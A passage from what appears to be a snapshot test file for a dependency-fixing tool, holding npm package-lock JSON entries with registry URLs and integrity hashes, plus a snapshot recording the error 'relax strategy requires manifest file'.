"sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "requires": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" } }, "getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "requires": { "assert-plus": "^1.0.0" } }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" } }, "graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "requires": { "natives": "^1.1.3" } }, "har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" }, "har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "requires": { "ajv": "^6.12.3", "har-schema": "^2.0.0" } }, "has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "requires": { "function-bind": "^1.1.2" } }, "hosted-git-info": { "version": "2.1.4", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.1.4.tgz", "integrity": "sha512-4R9eDu2ytsDMdo7nQXHrpK1347y3nu/ThXZ4tjpkUTsZnzoIIQprnPOM65c20oInjmocLuEGBIbPsesYCqibag==" }, "http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "requires": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" } }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "requires": { "once": "^1.3.0", "wrappy": "1" } }, "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "requires": { "hasown": "^2.0.0" } }, "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true }, "is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" } }, "mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, "mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { "mime-db": "1.52.0" } }, "minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", "requires": { "brace-expansion": "^1.1.7" } }, "minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "requires": { "minimist": "^1.2.6" } }, "natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==" }, "normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "requires": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "requires": { "hosted-git-info": "^1.5.3", "semver": "4" }, "dependencies": { "hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" } } }, "npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "requires": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "npmlog": "", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" } }, "npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "requires": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" } }, "oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { "wrappy": "1" } }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" }, "path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==" }, "qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" }, "readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "requires": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" } }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } }, "retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==" }, "rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "requires": { "glob": "^7.1.3" } }, "safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==" }, "set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true }, "slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==" }, "spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "requires": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- [TestCommand/errors_when_relax_used_without_manifest - 1] --- [TestCommand/errors_when_relax_used_without_manifest - 2] relax strategy requires manifest file --- [TestCommand/errors_when_relax_used_without_manifest - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.12.6", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", "dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, "node_modules/assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", 